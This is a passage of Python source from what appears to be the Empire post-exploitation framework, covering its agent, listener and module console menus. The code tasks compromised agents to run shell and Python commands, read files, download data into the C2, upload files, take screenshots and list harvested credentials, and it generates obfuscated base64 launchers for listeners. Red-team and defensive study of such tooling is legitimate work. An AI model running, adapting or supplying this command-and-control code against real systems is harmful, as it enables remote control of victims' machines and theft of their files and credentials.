if len(parts) > 0:
# check if we got an agent command
if parts[0] in self.agentCommands:
shellcmd = ' '.join(parts)
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", shellcmd)
# dispatch this event
message = "[*] Tasked agent to run command {}".format(line)
signal = json.dumps({
'print': False,
'message': message,
'command': line
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to run command " + line
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
else:
print(helpers.color("[!] Command not recognized."))
print(helpers.color("[*] Use 'help' or 'help agentcmds' to see available commands."))
def do_dirlist(self, line):
"Tasks an agent to store the contents of a directory in the database."
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_DIR_LIST", line)
def do_help(self, *args):
"Displays the help menu or syntax for particular commands."
SubMenu.do_help(self, *args)
def do_list(self, line):
"Lists all active agents (or listeners)."
if line.lower().startswith("listeners"):
self.mainMenu.do_list("listeners " + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("agents"):
self.mainMenu.do_list("agents " + str(' '.join(line.split(' ')[1:])))
else:
print(helpers.color("[!] Please use 'list [agents/listeners] <modifier>'."))
def do_rename(self, line):
"Rename the agent."
parts = line.strip().split(' ')
oldname = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# make sure we get a new name to rename this agent
if len(parts) == 1 and parts[0].strip() != '':
# replace the old name with the new name
result = self.mainMenu.agents.rename_agent(oldname, parts[0])
if result:
self.prompt = "(Empire: " + helpers.color(parts[0], 'red') + ") > "
else:
print(helpers.color("[!] Please enter a new name for the agent"))
def do_info(self, line):
"Display information about this agent"
# get the agent name, if applicable
agent = self.mainMenu.agents.get_agent_db(self.sessionID)
messages.display_agent(agent)
def do_exit(self, line):
"Task agent to exit."
try:
choice = input(helpers.color("[>] Task agent to exit? [y/N] ", "red"))
if choice.lower() == "y":
self.mainMenu.agents.add_agent_task_db(self.sessionID, 'TASK_EXIT')
# dispatch this event
message = "[*] Tasked agent to exit"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to exit")
raise NavAgents
except KeyboardInterrupt:
print("")
def do_clear(self, line):
"Clear out agent tasking."
self.mainMenu.agents.clear_agent_tasks_db(self.sessionID)
def do_cd(self, line):
"Change an agent's active directory"
line = line.strip()
if line != "":
# have to be careful with inline python and no threading
# this can cause the agent to crash so we will use try / catch
# task the agent with this shell command
if line == "..":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
'import os; os.chdir(os.pardir); print("Directory stepped down: %s")' % (
line))
else:
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
'import os; os.chdir("%s"); print("Directory changed to: %s)"' % (
line, line))
# dispatch this event
message = "[*] Tasked agent to change active directory to {}".format(line)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to change active directory to: %s" % (line)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_jobs(self, line):
"Return jobs or kill a running job."
parts = line.split(' ')
if len(parts) == 1:
if parts[0] == '':
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_GETJOBS")
# dispatch this event
message = "[*] Tasked agent to get running jobs"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get running jobs")
else:
print(helpers.color("[!] Please use form 'jobs kill JOB_ID'"))
elif len(parts) == 2:
jobID = parts[1].strip()
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_STOPJOB", jobID)
# dispatch this event
message = "[*] Tasked agent to get stop job {}".format(jobID)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to stop job " + str(jobID))
def do_sleep(self, line):
"Task an agent to 'sleep interval [jitter]'"
parts = line.strip().split(' ')
delay = parts[0]
# make sure we pass an int()
if len(parts) >= 1 and parts[0] != "":
try:
int(delay)
except:
print(helpers.color("[!] Please only enter integer for 'interval'"))
return
if len(parts) > 1:
try:
int(parts[1])
except:
print(helpers.color("[!] Please only enter integer for '[jitter]'"))
return
if delay == "":
# task the agent to display the delay/jitter
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
"global delay; global jitter; print('delay/jitter = ' + str(delay)+'/'+str(jitter))")
# dispatch this event
message = "[*] Tasked agent to display delay/jitter"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to display delay/jitter")
elif len(parts) > 0 and parts[0] != "":
delay = parts[0]
jitter = 0.0
if len(parts) == 2:
jitter = parts[1]
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("delay", delay, self.sessionID)
self.mainMenu.agents.set_agent_field_db("jitter", jitter, self.sessionID)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
"global delay; global jitter; delay=%s; jitter=%s; print('delay/jitter set to %s/%s')" % (
delay, jitter, delay, jitter))
# dispatch this event
message = "[*] Tasked agent to delay sleep/jitter {}/{}".format(delay, jitter)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to delay sleep/jitter " + str(delay) + "/" + str(jitter)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_lostlimit(self, line):
"Task an agent to display change the limit on lost agent detection"
parts = line.strip().split(' ')
lostLimit = parts[0]
if lostLimit == "":
# task the agent to display the lostLimit
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
"global lostLimit; print('lostLimit = ' + str(lostLimit))")
# dispatch this event
message = "[*] Tasked agent to display lost limit"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to display lost limit")
else:
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("lost_limit", lostLimit, self.sessionID)
# task the agent with the new lostLimit
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
"global lostLimit; lostLimit=%s; print('lostLimit set to %s')" % (
lostLimit, lostLimit))
# dispatch this event
message = "[*] Tasked agent to change lost limit {}".format(lostLimit)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to change lost limit " + str(lostLimit)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_killdate(self, line):
"Get or set an agent's killdate (01/01/2016)."
parts = line.strip().split(' ')
killDate = parts[0]
if killDate == "":
# task the agent to display the killdate
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
"global killDate; print('killDate = ' + str(killDate))")
# dispatch this event
message = "[*] Tasked agent to display killDate"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to display killDate")
else:
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("kill_date", killDate, self.sessionID)
# task the agent with the new killDate
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
"global killDate; killDate='%s'; print('killDate set to %s')" % (
killDate, killDate))
# dispatch this event
message = "[*] Tasked agent to set killDate to {}".format(killDate)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to set killdate to %s" % (killDate)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_workinghours(self, line):
"Get or set an agent's working hours (9:00-17:00)."
parts = line.strip().split(' ')
hours = parts[0]
if hours == "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
"global workingHours; print('workingHours = ' + str(workingHours))")
# dispatch this event
message = "[*] Tasked agent to get working hours"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get working hours")
else:
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("working_hours", hours, self.sessionID)
# task the agent with the new working hours
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
"global workingHours; workingHours= '%s'" % (hours))
# dispatch this event
message = "[*] Tasked agent to set working hours to {}".format(hours)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to set working hours to: %s" % (hours)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_shell(self, line):
"Task an agent to use a shell command."
line = line.strip()
if line != "":
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", str(line))
# dispatch this event
message = "[*] Tasked agent to run shell command: {}".format(line)
signal = json.dumps({
'print': False,
'message': message,
'command': line
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to run shell command: %s" % (line)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_python(self, line):
"Task an agent to run a Python command."
line = line.strip()
if line != "":
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", str(line))
# dispatch this event
message = "[*] Tasked agent to run Python command: {}".format(line)
signal = json.dumps({
'print': False,
'message': message,
'command': line
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to run Python command: %s" % (line)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_pythonscript(self, line):
"Load and execute a python script"
path = line.strip()
if os.path.splitext(path)[-1] == '.py' and os.path.isfile(path):
filename = os.path.splitext(os.path.basename(path))[0]
open_file = open(path, 'r')
script = open_file.read()
open_file.close()
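# normalize line endings so the MD5 recorded below matches the script data actually sent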
script = script.replace('\r\n', '\n')
script = script.replace('\r', '\n')
encScript = base64.b64encode(script.encode('utf-8')).decode('latin-1')
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SCRIPT_COMMAND", encScript)
# dispatch this event
message = "[*] Tasked agent to execute Python script: {}".format(filename)
signal = json.dumps({
'print': True,
'message': message,
'script_name': filename,
# note md5 is after replacements done on \r and \r\n above
'script_md5': hashlib.md5(script.encode('utf-8')).hexdigest()
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "[*] Tasked agent to execute python script: " + filename
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
else:
print(helpers.color("[!] Please provide a valid path", color="red"))
def do_sysinfo(self, line):
"Task an agent to get system information."
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SYSINFO")
# dispatch this event
message = "[*] Tasked agent to get system information"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get system information")
def do_download(self, line):
"Task an agent to download a file into the C2."
line = line.strip()
if line != "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_DOWNLOAD", line)
# dispatch this event
message = "[*] Tasked agent to download: {}".format(line)
signal = json.dumps({
'print': False,
'message': message,
'download_filename': line
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to download: %s" % (line)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_upload(self, line):
"Task the C2 to upload a file into an agent."
# "upload /path/file.ext" or "upload /path/file/file.ext newfile.ext"
# absolute paths accepted
parts = line.strip().split(' ')
uploadname = ""
if len(parts) > 0 and parts[0] != "":
if len(parts) == 1:
# if we're uploading the file with its original name
uploadname = os.path.basename(parts[0])
else:
# if we're uploading the file as a different name
uploadname = parts[1].strip()
if parts[0] != "" and os.path.exists(parts[0]):
# TODO: reimplement Python file upload
# read in the file and base64 encode it for transport
f = open(parts[0], 'rb')
fileData = f.read()
f.close()
# Get file size
size = os.path.getsize(parts[0])
if size > 1048576:
print(helpers.color("[!] File size is too large. Upload limit is 1MB."))
else:
print(helpers.color(
"[*] Original tasked size of %s for upload: %s" % (uploadname, helpers.get_file_size(fileData)),
color="green"))
original_md5 = hashlib.md5(fileData).hexdigest()
# update the agent log with the filename and MD5
msg = "Tasked agent to upload " + parts[0] + " : " + original_md5
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
# compress data before we base64
c = compress.compress()
start_crc32 = c.crc32_data(fileData)
comp_data = c.comp_data(fileData, 9)
fileData = c.build_header(comp_data, start_crc32)
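# build_header presumably prepends the original CRC32 so the agent can verify the data after decompression (inferred from the helper names)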
# get final file size
fileData = helpers.encode_base64(fileData)
# upload packets -> "filename | script data"
if isinstance(fileData, bytes):
fileData = fileData.decode("utf-8")
data = uploadname + "|" + fileData
# dispatch this event
message = "[*] Starting upload of {}, final size {}".format(uploadname,
helpers.get_file_size(fileData))
signal = json.dumps({
'print': True,
'message': message,
'upload_name': uploadname,
'upload_md5': original_md5,
'upload_size': helpers.get_file_size(fileData)
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_UPLOAD", data)
else:
print(helpers.color("[!] Please enter a valid file path to upload"))
def do_usemodule(self, line):
"Use an Empire Python module."
# Strip asterisks added by MainMenu.complete_usemodule()
module = "python/%s" % (line.strip().rstrip("*"))
if module not in self.mainMenu.modules.modules:
print(helpers.color("[!] Error: invalid module"))
else:
module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID)
module_menu.cmdloop()
def do_searchmodule(self, line):
"Search Empire module names/descriptions."
searchTerm = line.strip()
if searchTerm.strip() == "":
print(helpers.color("[!] Please enter a search term."))
else:
self.mainMenu.modules.search_modules(searchTerm)
def do_osx_screenshot(self, line):
"Use the python-mss module to take a screenshot, and save the image to the server. Not opsec safe"
if self.mainMenu.modules.modules['python/collection/osx/native_screenshot']:
module = self.mainMenu.modules.modules['python/collection/osx/native_screenshot']
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# execute screenshot module
msg = "[*] Tasked agent to take a screenshot"
module_menu = ModuleMenu(self.mainMenu, 'python/collection/osx/native_screenshot')
print(helpers.color(msg, color="green"))
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
# dispatch this event
message = "[*] Tasked agent to take a screenshot"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
module_menu.do_execute("")
else:
print(helpers.color("[!] python/collection/osx/screenshot module not loaded"))
def do_cat(self, line):
"View the contents of a file"
if line != "":
cmd = """
try:
output = ""
with open("%s","r") as f:
for line in f:
output += line
print(output)
except Exception as e:
print(str(e))
""" % (line)
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", str(cmd))
# dispatch this event
message = "[*] Tasked agent to cat file: {}".format(line)
signal = json.dumps({
'print': False,
'message': message,
'file_name': line
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to cat file %s" % (line)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_loadpymodule(self, line):
"Import zip file containing a .py module or package with an __init__.py"
path = line.strip()
# check the file ext and confirm that the path given is a file
if os.path.splitext(path)[-1] == '.zip' and os.path.isfile(path):
# open a handle to the file and save the data to a variable, zlib compress
filename = os.path.splitext(os.path.basename(path))[0]
open_file = open(path, 'rb')
module_data = open_file.read()
open_file.close()
# dispatch this event
message = "[*] Tasked agent to import {}, md5: {}".format(path, hashlib.md5(module_data).hexdigest())
signal = json.dumps({
'print': True,
'message': message,
'import_path': path,
'import_md5': hashlib.md5(module_data).hexdigest()
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
msg = "Tasked agent to import " + path + " : " + hashlib.md5(module_data).hexdigest()
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
c = compress.compress()
start_crc32 = c.crc32_data(module_data)
comp_data = c.comp_data(module_data, 9)
module_data = c.build_header(comp_data, start_crc32)
module_data = helpers.encode_base64(module_data)
data = filename + '|' + module_data
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_IMPORT_MODULE", data)
else:
print(helpers.color("[!] Please provide a valid zipfile path", color="red"))
def do_viewrepo(self, line):
"View the contents of a repo. if none is specified, all files will be returned"
repoName = line.strip()
# dispatch this event
message = "[*] Tasked agent to view repo contents: {}".format(repoName)
signal = json.dumps({
'print': True,
'message': message,
'repo_name': repoName
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "[*] Tasked agent to view repo contents: " + repoName
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_VIEW_MODULE", repoName)
def do_removerepo(self, line):
"Remove a repo"
repoName = line.strip()
# dispatch this event
message = "[*] Tasked agent to remove repo: {}".format(repoName)
signal = json.dumps({
'print': True,
'message': message,
'repo_name': repoName
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
msg = "[*] Tasked agent to remove repo: " + repoName
print(helpers.color(msg, color="green"))
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_REMOVE_MODULE", repoName)
def do_creds(self, line):
"Display/return credentials from the database."
self.mainMenu.do_creds(line)
def complete_loadpymodule(self, text, line, begidx, endidx):
"Tab-complete a zip file path"
return helpers.complete_path(text, line)
def complete_pythonscript(self, text, line, begidx, endidx):
"Tab-complete a zip file path"
return helpers.complete_path(text, line)
def complete_usemodule(self, text, line, begidx, endidx):
"Tab-complete an Empire Python module path"
return self.mainMenu.complete_usemodule(text, line, begidx, endidx, language='python')
def complete_upload(self, text, line, begidx, endidx):
"Tab-complete an upload file path"
return helpers.complete_path(text, line)
# def complete_updateprofile(self, text, line, begidx, endidx):
# "Tab-complete an updateprofile path"
# return helpers.complete_path(text,line)
class ListenersMenu(SubMenu):
"""
The main class used by Empire to drive the 'listener' menu.
"""
def __init__(self, mainMenu):
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Listener Commands'
# set the prompt text
self.prompt = '(Empire: ' + helpers.color('listeners', color='blue') + ') > '
# display all active listeners on menu startup
messages.display_listeners(self.mainMenu.listeners.activeListeners)
messages.display_listeners(self.mainMenu.listeners.get_inactive_listeners(), "Inactive")
def do_back(self, line):
"Go back to the main menu."
raise NavMain()
def do_list(self, line):
"List all active listeners (or agents)."
if line.lower().startswith('agents'):
self.mainMenu.do_list('agents ' + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("listeners"):
self.mainMenu.do_list('listeners ' + str(' '.join(line.split(' ')[1:])))
else:
self.mainMenu.do_list('listeners ' + str(line))
def do_kill(self, line):
"Kill one or all active listeners."
listenerID = line.strip()
if listenerID.lower() == 'all':
try:
choice = input(helpers.color('[>] Kill all listeners? [y/N] ', 'red'))
if choice.lower() != '' and choice.lower()[0] == 'y':
self.mainMenu.listeners.kill_listener('all')
except KeyboardInterrupt:
print('')
else:
self.mainMenu.listeners.kill_listener(listenerID)
def do_delete(self, line):
"Delete listener(s) from the database"
listener_id = line.strip()
if listener_id.lower() == "all":
try:
choice = input(helpers.color("[>] Delete all listeners? [y/N] ", "red"))
if choice.lower() != '' and choice.lower()[0] == 'y':
self.mainMenu.listeners.delete_listener("all")
except KeyboardInterrupt:
print('')
else:
self.mainMenu.listeners.delete_listener(listener_id)
def do_usestager(self, line):
"Use an Empire stager."
parts = line.split(' ')
if parts[0] not in self.mainMenu.stagers.stagers:
print(helpers.color("[!] Error: invalid stager module"))
elif len(parts) == 1:
stager_menu = StagerMenu(self.mainMenu, parts[0])
stager_menu.cmdloop()
elif len(parts) == 2:
listener = parts[1]
if not self.mainMenu.listeners.is_listener_valid(listener):
print(helpers.color("[!] Please enter a valid listener name or ID"))
else:
self.mainMenu.stagers.set_stager_option('Listener', listener)
stager_menu = StagerMenu(self.mainMenu, parts[0])
stager_menu.cmdloop()
else:
print(helpers.color("[!] Error in ListenerMenu's do_userstager()"))
def do_uselistener(self, line):
"Use an Empire listener module."
parts = line.split(' ')
if parts[0] not in self.mainMenu.listeners.loadedListeners:
print(helpers.color("[!] Error: invalid listener module"))
else:
listenerMenu = ListenerMenu(self.mainMenu, parts[0])
listenerMenu.cmdloop()
def do_info(self, line):
"Display information for the given active listener."
listenerName = line.strip()
if listenerName not in self.mainMenu.listeners.activeListeners:
print(helpers.color("[!] Invalid listener name"))
else:
messages.display_active_listener(self.mainMenu.listeners.activeListeners[listenerName])
def do_launcher(self, line):
"Generate an initial launcher for a listener."
parts = line.strip().split()
if len(parts) != 2:
print(helpers.color("[!] Please enter 'launcher <language> <listenerName>'"))
return
else:
language = parts[0].lower()
listenerName = self.mainMenu.listeners.get_listener_name(parts[1])
if listenerName:
try:
# set the listener value for the launcher
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]
stager = self.mainMenu.stagers.stagers['multi/launcher']
stager.options['Listener']['Value'] = listenerName
stager.options['Language']['Value'] = language
stager.options['Base64']['Value'] = "True"
try:
stager.options['Proxy']['Value'] = listenerOptions['options']['Proxy']['Value']
stager.options['ProxyCreds']['Value'] = listenerOptions['options']['ProxyCreds']['Value']
except:
pass
if self.mainMenu.obfuscate:
stager.options['Obfuscate']['Value'] = "True"
else:
stager.options['Obfuscate']['Value'] = "False"
# dispatch this event
message = "[*] Generated launcher"
signal = json.dumps({
'print': False,
'message': message,
'options': stager.options
})
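# launcher generation is a server-side action, so the event is dispatched from the "empire" sender rather than an agent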
dispatcher.send(signal, sender="empire")
print(stager.generate())
except Exception as e:
print(helpers.color("[!] Error generating launcher: %s" % (e)))
else:
print(helpers.color("[!] Please enter a valid listenerName"))
def do_enable(self, line):
"Enables and starts one or all listeners."
listenerID = line.strip()
if listenerID == '':
print(helpers.color("[!] Please provide a listener name"))
elif listenerID.lower() == 'all':
try:
choice = input(helpers.color('[>] Start all listeners? [y/N] ', 'red'))
if choice.lower() != '' and choice.lower()[0] == 'y':
self.mainMenu.listeners.enable_listener('all')
except KeyboardInterrupt:
print('')
else:
self.mainMenu.listeners.enable_listener(listenerID)
def do_disable(self, line):
"Disables (stops) one or all listeners. The listener(s) will not start automatically with Empire"
listenerID = line.strip()
if listenerID.lower() == 'all':
try:
choice = input(helpers.color('[>] Stop all listeners? [y/N] ', 'red'))
if choice.lower() != '' and choice.lower()[0] == 'y':
self.mainMenu.listeners.shutdown_listener('all')
except KeyboardInterrupt:
print('')
else:
self.mainMenu.listeners.disable_listener(listenerID)
def do_edit(self, line):
"Change a listener option, will not take effect until the listener is restarted"
arguments = line.strip().split(" ")
if len(arguments) < 2:
print(helpers.color("[!] edit <listener name> <option name> <option value> (leave value blank to unset)"))
return
if len(arguments) == 2:
arguments.append("")
self.mainMenu.listeners.update_listener_options(arguments[0], arguments[1], ' '.join(arguments[2:]))
if arguments[0] in list(self.mainMenu.listeners.activeListeners.keys()):
print(helpers.color("[*] This change will not take effect until the listener is restarted"))
def complete_usestager(self, text, line, begidx, endidx):
"Tab-complete an Empire stager module path."
return self.mainMenu.complete_usestager(text, line, begidx, endidx)
def complete_kill(self, text, line, begidx, endidx):
"Tab-complete listener names"
# get all the listener names
names = list(self.mainMenu.listeners.activeListeners.keys()) + ["all"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_enable(self, text, line, begidx, endidx):
# tab complete for inactive listener names
inactive = self.mainMenu.listeners.get_inactive_listeners()
names = list(inactive.keys())
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_disable(self, text, line, begidx, endidx):
# tab complete for listener names
# get all the listener names
names = list(self.mainMenu.listeners.activeListeners.keys()) + ["all"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_delete(self, text, line, begidx, endidx):
# tab complete for listener names
# get all the listener names
names = list(self.mainMenu.listeners.activeListeners.keys()) + ["all"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_launcher(self, text, line, begidx, endidx):
"Tab-complete language types and listener names/IDs"
languages = ['powershell', 'python']
if line.split(' ')[1].lower() in languages:
# if we already have a language name, tab-complete listener names
listenerNames = self.mainMenu.listeners.get_listener_names()
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in listenerNames if s.startswith(mline)]
else:
# otherwise tab-complete the language names
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in languages if s.startswith(mline)]
def complete_info(self, text, line, begidx, endidx):
"Tab-complete listener names/IDs"
# get all the listener names
names = list(self.mainMenu.listeners.activeListeners.keys())
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_uselistener(self, text, line, begidx, endidx):
"Tab-complete an uselistener command"
names = list(self.mainMenu.listeners.loadedListeners.keys())
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
class ListenerMenu(SubMenu):
def __init__(self, mainMenu, listenerName):
SubMenu.__init__(self, mainMenu)
if listenerName not in self.mainMenu.listeners.loadedListeners:
print(helpers.color("[!] Listener '%s' not currently valid!" % (listenerName)))
raise NavListeners()
self.doc_header = 'Listener Commands'
self.listener = self.mainMenu.listeners.loadedListeners[listenerName]
self.listenerName = listenerName
# set the text prompt
self.prompt = '(Empire: ' + helpers.color("listeners/%s" % (listenerName), 'red') + ') > '
def do_info(self, line):
"Display listener module options."
messages.display_listener_module(self.listener)
def do_execute(self, line):
"Execute the given listener module."
self.mainMenu.listeners.start_listener(self.listenerName, self.listener)
def do_launcher(self, line):
"Generate an initial launcher for this listener."
self.listenerName = self.listener.options['Name']['Value']
parts = line.strip().split()
if len(parts) != 1:
print(helpers.color("[!] Please enter 'launcher <language>'"))
return
try:
# set the listener value for the launcher
listenerOptions = self.mainMenu.listeners.activeListeners[self.listenerName]
stager = self.mainMenu.stagers.stagers['multi/launcher']
stager.options['Listener']['Value'] = self.listenerName
stager.options['Language']['Value'] = parts[0]
stager.options['Base64']['Value'] = "True"
try:
stager.options['Proxy']['Value'] = listenerOptions['options']['Proxy']['Value']
stager.options['ProxyCreds']['Value'] = listenerOptions['options']['ProxyCreds']['Value']
except:
pass
# dispatch this event
message = "[*] Generated launcher"
signal = json.dumps({
'print': False,
'message': message,
'options': stager.options
})
dispatcher.send(signal, sender="empire")
print(stager.generate())
except Exception as e:
print(helpers.color("[!] Error generating launcher: %s" % (e)))
def do_set(self, line):
"Set a listener option."
parts = line.split()
try:
option = parts[0]
if option not in self.listener.options:
print(helpers.color("[!] Invalid option specified."))
elif len(parts) == 1:
# "set OPTION"
# check if we're setting a switch
if self.listener.options[option]['Description'].startswith("Switch."):
self.listener.options[option]['Value'] = "True"
else:
print(helpers.color("[!] Please specify an option value."))
else:
# otherwise "set OPTION VALUE"
option = parts[0]
value = ' '.join(parts[1:])
if value == '""' or value == "''":
value = ""
self.mainMenu.listeners.set_listener_option(self.listenerName, option, value)
except Exception as e:
print(helpers.color("[!] Error in setting listener option: %s" % (e)))
def do_unset(self, line):
"Unset a listener option."
option = line.split()[0]
if line.lower() == "all":
for option in self.listener.options:
self.listener.options[option]['Value'] = ''
if option not in self.listener.options:
print(helpers.color("[!] Invalid option specified."))
else:
self.listener.options[option]['Value'] = ''
def complete_set(self, text, line, begidx, endidx):
"Tab-complete a listener option to set."
options = list(self.listener.options.keys())
if line.split(' ')[1].lower().endswith('path'):
return helpers.complete_path(text, line, arg=True)
elif line.split(' ')[1].lower().endswith('file'):
return helpers.complete_path(text, line, arg=True)
elif line.split(' ')[1].lower().endswith('host'):
return [helpers.lhost()]
elif line.split(' ')[1].lower().endswith('listener'):
listenerNames = self.mainMenu.listeners.get_listener_names()
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in listenerNames if s.startswith(mline)]
# otherwise we're tab-completing an option name
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_unset(self, text, line, begidx, endidx):
"Tab-complete a module option to unset."
options = list(self.listener.options.keys())
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_launcher(self, text, line, begidx, endidx):
"Tab-complete language types"
languages = ['powershell', 'python']
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in languages if s.startswith(mline)]
class ModuleMenu(SubMenu):
"""
The main class used by Empire to drive the 'module' menu.
"""
def __init__(self, mainMenu, moduleName, agent=None):
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Module Commands'
try:
# get the current module/name
self.moduleName = moduleName
self.module = self.mainMenu.modules.modules[moduleName]
# set the prompt text
self.prompt = '(Empire: ' + helpers.color(self.moduleName, color="blue") + ') > '
# if this menu is being called from an agent menu
if agent and 'Agent' in self.module.options:
# resolve the agent sessionID to a name, if applicable
agent = self.mainMenu.agents.get_agent_name_db(agent)
